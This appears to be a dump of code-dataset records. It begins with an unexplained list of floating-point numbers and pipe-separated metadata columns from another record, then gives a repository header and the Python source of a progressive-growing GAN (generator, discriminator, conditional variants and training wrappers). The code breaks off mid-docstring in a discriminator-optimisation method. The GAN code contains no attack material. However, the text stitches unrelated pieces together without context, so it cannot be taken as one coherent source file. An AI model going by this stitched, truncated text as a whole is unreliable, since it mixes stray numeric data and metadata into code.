1.7696641934421677, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, -1.2303358065578323, -3.2303358065578323, -3.2303358065578323, -1.2303358065578323, -1.2303358065578323, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, 0.7696641934421677, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, -1.2303358065578323, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, -2.2303358065578323, -1.2303358065578323, 0.7696641934421677, 1.7696641934421677, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -2.2303358065578323, -0.23033580655783226, 1.7696641934421677, 3.7696641934421677, 3.7696641934421677, 1.7696641934421677, 2.7696641934421677, 4.769664193442168, 4.769664193442168, 3.7696641934421677, 2.7696641934421677, 2.7696641934421677, 2.7696641934421677, 3.7696641934421677, 2.7696641934421677, 0.7696641934421677, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, 3.7696641934421677, 1.7696641934421677, -1.2303358065578323, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -1.2303358065578323, -1.2303358065578323, 0.7696641934421677, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -3.2303358065578323, -1.2303358065578323, -2.2303358065578323, -3.2303358065578323, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, 1.7696641934421677, -0.23033580655783226, -3.2303358065578323, -2.2303358065578323, -2.2303358065578323, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, -3.2303358065578323, -1.2303358065578323, -0.23033580655783226, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, 1.7696641934421677, 2.7696641934421677, 1.7696641934421677, 1.7696641934421677, 2.7696641934421677, 5.769664193442168, 5.769664193442168, 4.769664193442168, 4.769664193442168, 3.7696641934421677, 4.769664193442168, 4.769664193442168, 3.7696641934421677, 2.7696641934421677, 3.7696641934421677, 3.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, 1.7696641934421677, 3.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, -1.2303358065578323, 0.7696641934421677, 1.7696641934421677, -0.23033580655783226, -2.2303358065578323, -0.23033580655783226, 1.7696641934421677, 0.7696641934421677, 1.7696641934421677, -1.2303358065578323, -1.2303358065578323, 0.7696641934421677, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, 2.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, -2.2303358065578323, -1.2303358065578323, -2.2303358065578323, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -1.2303358065578323, -3.2303358065578323, -4.230335806557832, -7.230335806557832, -6.230335806557832, -2.2303358065578323, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, 0.7696641934421677, 2.7696641934421677, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 4.769664193442168, 4.769664193442168, 5.769664193442168, 2.7696641934421677, 3.7696641934421677, 5.769664193442168, 3.7696641934421677, 1.7696641934421677, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, -0.23033580655783226, -3.2303358065578323, -3.2303358065578323, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -4.230335806557832, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -2.2303358065578323, -3.2303358065578323, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, -1.2303358065578323, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -1.2303358065578323, 0.7696641934421677, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, 2.7696641934421677, 0.7696641934421677, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, 1.7696641934421677, 4.769664193442168, 3.7696641934421677, 3.7696641934421677, 3.7696641934421677, 4.769664193442168, 5.769664193442168, 4.769664193442168, 2.7696641934421677, 2.7696641934421677, 1.7696641934421677, 0.7696641934421677, -2.2303358065578323, -3.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -2.2303358065578323, -6.230335806557832, -5.230335806557832, -5.230335806557832, -5.230335806557832, -4.230335806557832, -6.230335806557832, -4.230335806557832, -3.2303358065578323, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -1.2303358065578323, -0.23033580655783226, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, 0.7696641934421677, 2.7696641934421677, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -1.2303358065578323, -2.2303358065578323, -3.2303358065578323, -3.2303358065578323, -4.230335806557832, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, 2.7696641934421677, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 2.7696641934421677, 0.7696641934421677, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -3.2303358065578323, -2.2303358065578323, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, -2.2303358065578323, -0.23033580655783226, 1.7696641934421677, 2.7696641934421677, 2.7696641934421677, 0.7696641934421677, 1.7696641934421677, 4.769664193442168, 4.769664193442168, 4.769664193442168, 1.7696641934421677, 2.7696641934421677, 3.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -3.2303358065578323, -3.2303358065578323, -2.2303358065578323, -3.2303358065578323, -2.2303358065578323, -3.2303358065578323, -2.2303358065578323, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, 3.7696641934421677, 3.7696641934421677, 1.7696641934421677, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, -1.2303358065578323, -1.2303358065578323, -1.2303358065578323, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, 2.7696641934421677, 2.7696641934421677, 0.7696641934421677, -0.23033580655783226, 1.7696641934421677, 3.7696641934421677, 4.769664193442168, 4.769664193442168, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -2.2303358065578323, -3.2303358065578323, -2.2303358065578323, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, -2.2303358065578323, -0.23033580655783226, 0.7696641934421677, 3.7696641934421677, 1.7696641934421677, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, 2.7696641934421677, 0.7696641934421677, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, -1.2303358065578323, -1.2303358065578323, -1.2303358065578323, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, 2.7696641934421677, 4.769664193442168, 2.7696641934421677, 0.7696641934421677, -0.23033580655783226, 0.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -3.2303358065578323, -1.2303358065578323, 1.7696641934421677, 0.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 2.7696641934421677, 2.7696641934421677, -0.23033580655783226, -3.2303358065578323, -2.2303358065578323, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, 0.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, 1.7696641934421677, 0.7696641934421677, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -0.23033580655783226, 1.7696641934421677, 0.7696641934421677, 1.7696641934421677, -0.23033580655783226, 1.7696641934421677, 3.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, -2.2303358065578323, -4.230335806557832, -3.2303358065578323, -1.2303358065578323, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, -1.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, -0.23033580655783226, 1.7696641934421677, 1.7696641934421677, 3.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, 0.7696641934421677, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, 1.7696641934421677, 1.7696641934421677, 3.7696641934421677, 4.769664193442168, 1.7696641934421677, 0.7696641934421677, 1.7696641934421677, 2.7696641934421677, 1.7696641934421677, -1.2303358065578323, -3.2303358065578323, -3.2303358065578323, -2.2303358065578323, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -2.2303358065578323, 0.7696641934421677, 0.7696641934421677, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, 2.7696641934421677, 0.7696641934421677, 1.7696641934421677, 0.7696641934421677, -0.23033580655783226, 0.7696641934421677, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, 2.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, 2.7696641934421677, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -0.23033580655783226, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, 0.7696641934421677, -0.23033580655783226, -1.2303358065578323, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677]
| 2,597.375
| 20,691
| 0.827181
| 2,016
| 20,779
| 8.525298
| 0.014385
| 0.19794
| 0.226567
| 0.106825
| 0.990342
| 0.968057
| 0.955024
| 0.897888
| 0.804503
| 0.65951
| 0
| 0.867308
| 0.04904
| 20,779
| 8
| 20,691
| 2,597.375
| 0.00248
| 0.003706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
ac219555012cd1c763fa6e5095feda0ffadaeb49
| 24,999
|
py
|
Python
|
GAN/networks/PRO_GAN.py
|
MacroHardGang/desegan
|
d7cdd39c8c9de76f6d5b5a36cee3d8850b177687
|
[
"MIT"
] | null | null | null |
GAN/networks/PRO_GAN.py
|
MacroHardGang/desegan
|
d7cdd39c8c9de76f6d5b5a36cee3d8850b177687
|
[
"MIT"
] | 6
|
2018-09-15T04:44:34.000Z
|
2019-04-14T07:10:12.000Z
|
GAN/networks/PRO_GAN.py
|
MacroHardGang/desegan
|
d7cdd39c8c9de76f6d5b5a36cee3d8850b177687
|
[
"MIT"
] | 1
|
2019-03-14T15:49:45.000Z
|
2019-03-14T15:49:45.000Z
|
""" Module implementing GAN which will be trained using the Progressive growing
technique -> https://arxiv.org/abs/1710.10196
"""
import numpy as np
import torch as th
class Generator(th.nn.Module):
""" Generator of the GAN network """
def __init__(self, depth=7, latent_size=512, use_eql=True):
"""
constructor for the Generator class
:param depth: required depth of the Network
:param latent_size: size of the latent manifold
:param use_eql: whether to use equalized learning rate
"""
from torch.nn import ModuleList, Upsample
from networks.CustomLayers import GenGeneralConvBlock, GenInitialBlock
super(Generator, self).__init__()
assert latent_size != 0 and ((latent_size & (latent_size - 1)) == 0), \
"latent size not a power of 2"
if depth >= 4:
assert latent_size >= np.power(2, depth - 4), "latent size will diminish to zero"
# state of the generator:
self.use_eql = use_eql
self.depth = depth
self.latent_size = latent_size
# register the modules required for the GAN
self.initial_block = GenInitialBlock(self.latent_size, use_eql=self.use_eql)
# create a module list of the other required general convolution blocks
self.layers = ModuleList([]) # initialize to empty list
# create the ToRGB layers for various outputs:
if self.use_eql:
from networks.CustomLayers import _equalized_conv2d
self.toRGB = lambda in_channels: \
_equalized_conv2d(in_channels, 3, (1, 1), bias=True)
else:
from torch.nn import Conv2d
self.toRGB = lambda in_channels: Conv2d(in_channels, 3, (1, 1), bias=True)
self.rgb_converters = ModuleList([self.toRGB(self.latent_size)])
# create the remaining layers
for i in range(self.depth - 1):
if i <= 2:
layer = GenGeneralConvBlock(self.latent_size,
self.latent_size, use_eql=self.use_eql)
rgb = self.toRGB(self.latent_size)
else:
layer = GenGeneralConvBlock(
int(self.latent_size // np.power(2, i - 3)),
int(self.latent_size // np.power(2, i - 2)),
use_eql=self.use_eql
)
rgb = self.toRGB(int(self.latent_size // np.power(2, i - 2)))
self.layers.append(layer)
self.rgb_converters.append(rgb)
# register the temporary upsampler
self.temporaryUpsampler = Upsample(scale_factor=2)
def forward(self, x, depth, alpha):
"""
forward pass of the Generator
:param x: input noise
:param depth: current depth from where output is required
:param alpha: value of alpha for fade-in effect
:return: y => output
"""
assert depth < self.depth, "Requested output depth cannot be produced"
y = self.initial_block(x)
if depth > 0:
for block in self.layers[:depth - 1]:
y = block(y)
residual = self.rgb_converters[depth - 1](self.temporaryUpsampler(y))
straight = self.rgb_converters[depth](self.layers[depth - 1](y))
out = (alpha * straight) + ((1 - alpha) * residual)
else:
out = self.rgb_converters[0](y)
return out
class Discriminator(th.nn.Module):
""" Discriminator of the GAN """
def __init__(self, height=7, feature_size=512, use_eql=True):
"""
constructor for the class
:param height: total height of the discriminator (Must be equal to the Generator depth)
:param feature_size: size of the deepest features extracted
(Must be equal to Generator latent_size)
:param use_eql: whether to use equalized learning rate
"""
from torch.nn import ModuleList, AvgPool2d
from networks.CustomLayers import DisGeneralConvBlock, DisFinalBlock
super(Discriminator, self).__init__()
assert feature_size != 0 and ((feature_size & (feature_size - 1)) == 0), \
"latent size not a power of 2"
if height >= 4:
assert feature_size >= np.power(2, height - 4), "feature size cannot be produced"
# create state of the object
self.use_eql = use_eql
self.height = height
self.feature_size = feature_size
self.final_block = DisFinalBlock(self.feature_size, use_eql=self.use_eql)
# create a module list of the other required general convolution blocks
self.layers = ModuleList([]) # initialize to empty list
# create the fromRGB layers for various inputs:
if self.use_eql:
from networks.CustomLayers import _equalized_conv2d
self.fromRGB = lambda out_channels: \
_equalized_conv2d(3, out_channels, (1, 1), bias=True)
else:
from torch.nn import Conv2d
self.fromRGB = lambda out_channels: Conv2d(3, out_channels, (1, 1), bias=True)
self.rgb_to_features = ModuleList([self.fromRGB(self.feature_size)])
# create the remaining layers
for i in range(self.height - 1):
if i > 2:
layer = DisGeneralConvBlock(
int(self.feature_size // np.power(2, i - 2)),
int(self.feature_size // np.power(2, i - 3)),
use_eql=self.use_eql
)
rgb = self.fromRGB(int(self.feature_size // np.power(2, i - 2)))
else:
layer = DisGeneralConvBlock(self.feature_size,
self.feature_size, use_eql=self.use_eql)
rgb = self.fromRGB(self.feature_size)
self.layers.append(layer)
self.rgb_to_features.append(rgb)
# register the temporary downSampler
self.temporaryDownsampler = AvgPool2d(2)
def forward(self, x, height, alpha):
"""
forward pass of the discriminator
:param x: input to the network
:param height: current height of operation (Progressive GAN)
:param alpha: current value of alpha for fade-in
:return: out => raw prediction values (WGAN-GP)
"""
assert height < self.height, "Requested output depth cannot be produced"
if height > 0:
residual = self.rgb_to_features[height - 1](self.temporaryDownsampler(x))
straight = self.layers[height - 1](
self.rgb_to_features[height](x)
)
y = (alpha * straight) + ((1 - alpha) * residual)
for block in reversed(self.layers[:height - 1]):
y = block(y)
else:
y = self.rgb_to_features[0](x)
out = self.final_block(y)
return out
class ConditionalDiscriminator(th.nn.Module):
""" Discriminator of the GAN """
def __init__(self, height=7, feature_size=512,
compressed_latent_size=128, use_eql=True):
"""
constructor for the class
:param height: total height of the discriminator (Must be equal to the Generator depth)
:param feature_size: size of the deepest features extracted
(Must be equal to Generator latent_size)
:param compressed_latent_size: size of the compressed version
:param use_eql: whether to use equalized learning rate
"""
from torch.nn import ModuleList, AvgPool2d
from networks.CustomLayers import DisGeneralConvBlock, ConDisFinalBlock
super(ConditionalDiscriminator, self).__init__()
assert feature_size != 0 and ((feature_size & (feature_size - 1)) == 0), \
"latent size not a power of 2"
if height >= 4:
assert feature_size >= np.power(2, height - 4), "feature size cannot be produced"
# create state of the object
self.use_eql = use_eql
self.height = height
self.feature_size = feature_size
self.compressed_latent_size = compressed_latent_size
self.final_block = ConDisFinalBlock(self.feature_size, self.feature_size,
self.compressed_latent_size, use_eql=self.use_eql)
# create a module list of the other required general convolution blocks
self.layers = ModuleList([]) # initialize to empty list
# create the fromRGB layers for various inputs:
if self.use_eql:
from networks.CustomLayers import _equalized_conv2d
self.fromRGB = lambda out_channels: \
_equalized_conv2d(3, out_channels, (1, 1), bias=True)
else:
from torch.nn import Conv2d
self.fromRGB = lambda out_channels: Conv2d(3, out_channels, (1, 1), bias=True)
self.rgb_to_features = ModuleList([self.fromRGB(self.feature_size)])
# create the remaining layers
for i in range(self.height - 1):
if i > 2:
layer = DisGeneralConvBlock(
int(self.feature_size // np.power(2, i - 2)),
int(self.feature_size // np.power(2, i - 3)),
use_eql=self.use_eql
)
rgb = self.fromRGB(int(self.feature_size // np.power(2, i - 2)))
else:
layer = DisGeneralConvBlock(self.feature_size,
self.feature_size, use_eql=self.use_eql)
rgb = self.fromRGB(self.feature_size)
self.layers.append(layer)
self.rgb_to_features.append(rgb)
# register the temporary downSampler
self.temporaryDownsampler = AvgPool2d(2)
def forward(self, x, latent_vector, height, alpha):
"""
forward pass of the discriminator
:param x: input to the network
:param latent_vector: latent vector required for conditional discrimination
:param height: current height of operation (Progressive GAN)
:param alpha: current value of alpha for fade-in
:return: out => raw prediction values
"""
assert height < self.height, "Requested output depth cannot be produced"
if height > 0:
residual = self.rgb_to_features[height - 1](self.temporaryDownsampler(x))
straight = self.layers[height - 1](
self.rgb_to_features[height](x)
)
y = (alpha * straight) + ((1 - alpha) * residual)
for block in reversed(self.layers[:height - 1]):
y = block(y)
else:
y = self.rgb_to_features[0](x)
out = self.final_block(y, latent_vector)
return out
class ProGAN:
""" Wrapper around the Generator and the Discriminator """
def __init__(self, depth=7, latent_size=512, learning_rate=0.001, beta_1=0,
beta_2=0.99, eps=1e-8, drift=0.001, n_critic=1, use_eql=True,
loss="wgan-gp", use_ema=True, ema_decay=0.999,
device=th.device("cuda")):
"""
constructor for the class
:param depth: depth of the GAN (will be used for each generator and discriminator)
:param latent_size: latent size of the manifold used by the GAN
:param learning_rate: learning rate for Adam
:param beta_1: beta_1 for Adam
:param beta_2: beta_2 for Adam
:param eps: epsilon for Adam
:param n_critic: number of times to update discriminator
(Used only if loss is wgan or wgan-gp)
:param drift: drift penalty for the
(Used only if loss is wgan or wgan-gp)
:param use_eql: whether to use equalized learning rate
:param loss: the loss function to be used
Can either be a string =>
["wgan-gp", "wgan", "lsgan", "lsgan-with-sigmoid"]
Or an instance of GANLoss
:param use_ema: boolean for whether to use exponential moving averages
:param ema_decay: value of mu for ema
:param device: device to run the GAN on (GPU / CPU)
"""
from torch.optim import Adam
# Create the Generator and the Discriminator
self.gen = Generator(depth, latent_size, use_eql=use_eql).to(device)
self.dis = Discriminator(depth, latent_size, use_eql=use_eql).to(device)
# state of the object
self.latent_size = latent_size
self.depth = depth
self.use_ema = use_ema
self.ema_decay = ema_decay
self.n_critic = n_critic
self.use_eql = use_eql
self.device = device
self.drift = drift
# define the optimizers for the discriminator and generator
self.gen_optim = Adam(self.gen.parameters(), lr=learning_rate,
betas=(beta_1, beta_2), eps=eps)
self.dis_optim = Adam(self.dis.parameters(), lr=learning_rate,
betas=(beta_1, beta_2), eps=eps)
# define the loss function used for training the GAN
self.loss = self.__setup_loss(loss)
# setup the ema for the generator
if self.use_ema:
from networks.CustomLayers import EMA
self.ema = EMA(self.ema_decay)
self.__register_generator_to_ema()
def __register_generator_to_ema(self):
for name, param in self.gen.named_parameters():
if param.requires_grad:
self.ema.register(name, param.data)
def __apply_ema_on_generator(self):
for name, param in self.gen.named_parameters():
if param.requires_grad:
param.data = self.ema(name, param.data)
def __setup_loss(self, loss):
import networks.Losses as losses
if isinstance(loss, str):
loss = loss.lower() # lowercase the string
if loss == "wgan":
loss = losses.WGAN_GP(self.device, self.dis, self.drift, use_gp=False)
# note if you use just wgan, you will have to use weight clipping
# in order to prevent gradient exploding
elif loss == "wgan-gp":
loss = losses.WGAN_GP(self.device, self.dis, self.drift, use_gp=True)
elif loss == "lsgan":
loss = losses.LSGAN(self.device, self.dis)
elif loss == "lsgan-with-sigmoid":
loss = losses.LSGAN_SIGMOID(self.device, self.dis)
else:
raise ValueError("Unknown loss function requested")
elif not isinstance(loss, losses.GANLoss):
raise ValueError("loss is neither an instance of GANLoss nor a string")
return loss
def optimize_discriminator(self, noise, real_batch, depth, alpha):
"""
performs one step of weight update on discriminator using the batch of data
:param noise: input noise of sample generation
:param real_batch: real samples batch
:param depth: current depth of optimization
:param alpha: current alpha for fade-in
:return: current loss (Wasserstein loss)
"""
from torch.nn import AvgPool2d
from torch.nn.functional import upsample
# downsample the real_batch for the given depth
down_sample_factor = int(np.power(2, self.depth - depth - 1))
prior_downsample_factor = max(int(np.power(2, self.depth - depth)), 0)
ds_real_samples = AvgPool2d(down_sample_factor)(real_batch)
if depth > 0:
prior_ds_real_samples = upsample(AvgPool2d(prior_downsample_factor)(real_batch),
scale_factor=2)
else:
prior_ds_real_samples = ds_real_samples
# real samples are a combination of ds_real_samples and prior_ds_real_samples
real_samples = (alpha * ds_real_samples) + ((1 - alpha) * prior_ds_real_samples)
loss_val = 0
for _ in range(self.n_critic):
# generate a batch of samples
fake_samples = self.gen(noise, depth, alpha).detach()
loss = self.loss.dis_loss(real_samples, fake_samples, depth, alpha)
# optimize discriminator
self.dis_optim.zero_grad()
loss.backward()
self.dis_optim.step()
loss_val += loss.item()
return loss_val / self.n_critic
def optimize_generator(self, noise, depth, alpha):
"""
performs one step of weight update on generator for the given batch_size
:param noise: input random noise required for generating samples
:param depth: depth of the network at which optimization is done
:param alpha: value of alpha for fade-in effect
:return: current loss (Wasserstein estimate)
"""
# generate fake samples:
fake_samples = self.gen(noise, depth, alpha)
# TODO: Change this implementation for making it compatible for relativisticGAN
loss = self.loss.gen_loss(None, fake_samples, depth, alpha)
# optimize the generator
self.gen_optim.zero_grad()
loss.backward()
self.gen_optim.step()
# if use_ema is true, apply ema to the generator parameters
if self.use_ema:
self.__apply_ema_on_generator()
# return the loss value
return loss.item()
class ConditionalProGAN:
""" Wrapper around the Generator and the Discriminator """
def __init__(self, embedding_size, depth=7, latent_size=512, compressed_latent_size=128,
learning_rate=0.001, beta_1=0, beta_2=0.99,
eps=1e-8, drift=0.001, n_critic=1, use_eql=True,
loss="wgan-gp", use_ema=True, ema_decay=0.999,
device=th.device("cuda")):
"""
constructor for the class
:param embedding_size: size of the encoded text embeddings
:param depth: depth of the GAN (will be used for each generator and discriminator)
:param latent_size: latent size of the manifold used by the GAN
:param compressed_latent_size: size of the compressed latent vectors
:param learning_rate: learning rate for Adam
:param beta_1: beta_1 for Adam
:param beta_2: beta_2 for Adam
:param eps: epsilon for Adam
:param n_critic: number of times to update discriminator
(Used only if loss is wgan or wgan-gp)
:param drift: drift penalty for the
(Used only if loss is wgan or wgan-gp)
:param use_eql: whether to use equalized learning rate
:param loss: the loss function to be used
Can either be a string =>
["wgan-gp", "wgan"]
Or an instance of GANLoss
:param use_ema: boolean for whether to use exponential moving averages
:param ema_decay: value of mu for ema
:param device: device to run the GAN on (GPU / CPU)
"""
from torch.optim import Adam
# Create the Generator and the Discriminator
self.gen = Generator(depth, latent_size, use_eql=use_eql).to(device)
self.dis = ConditionalDiscriminator(depth, embedding_size, compressed_latent_size,
use_eql=use_eql).to(device)
# state of the object
self.latent_size = latent_size
self.compressed_latent_size = compressed_latent_size
self.depth = depth
self.use_ema = use_ema
self.ema_decay = ema_decay
self.n_critic = n_critic
self.use_eql = use_eql
self.device = device
self.drift = drift
# define the optimizers for the discriminator and generator
self.gen_optim = Adam(self.gen.parameters(), lr=learning_rate,
betas=(beta_1, beta_2), eps=eps)
self.dis_optim = Adam(self.dis.parameters(), lr=learning_rate,
betas=(beta_1, beta_2), eps=eps)
# define the loss function used for training the GAN
self.loss = self.__setup_loss(loss)
# setup the ema for the generator
if self.use_ema:
from networks.CustomLayers import EMA
self.ema = EMA(self.ema_decay)
self.__register_generator_to_ema()
def __register_generator_to_ema(self):
for name, param in self.gen.named_parameters():
if param.requires_grad:
self.ema.register(name, param.data)
def __apply_ema_on_generator(self):
for name, param in self.gen.named_parameters():
if param.requires_grad:
param.data = self.ema(name, param.data)
def __setup_loss(self, loss):
import networks.Losses as losses
if isinstance(loss, str):
loss = loss.lower() # lowercase the string
if loss == "wgan":
loss = losses.CondWGAN_GP(self.device, self.dis, self.drift, use_gp=False)
# note if you use just wgan, you will have to use weight clipping
# in order to prevent gradient exploding
elif loss == "wgan-gp":
loss = losses.CondWGAN_GP(self.device, self.dis, self.drift, use_gp=True)
else:
raise ValueError("Unknown loss function requested")
elif not isinstance(loss, losses.ConditionalGANLoss):
raise ValueError("loss is neither an instance of GANLoss nor a string")
return loss
def optimize_discriminator(self, noise, real_batch, latent_vector, depth, alpha,
use_matching_aware=True):
"""
performs one step of weight update on discriminator using the batch of data
:param noise: input noise of sample generation
:param real_batch: real samples batch
:param latent_vector: (conditional latent vector)
:param depth: current depth of optimization
:param alpha: current alpha for fade-in
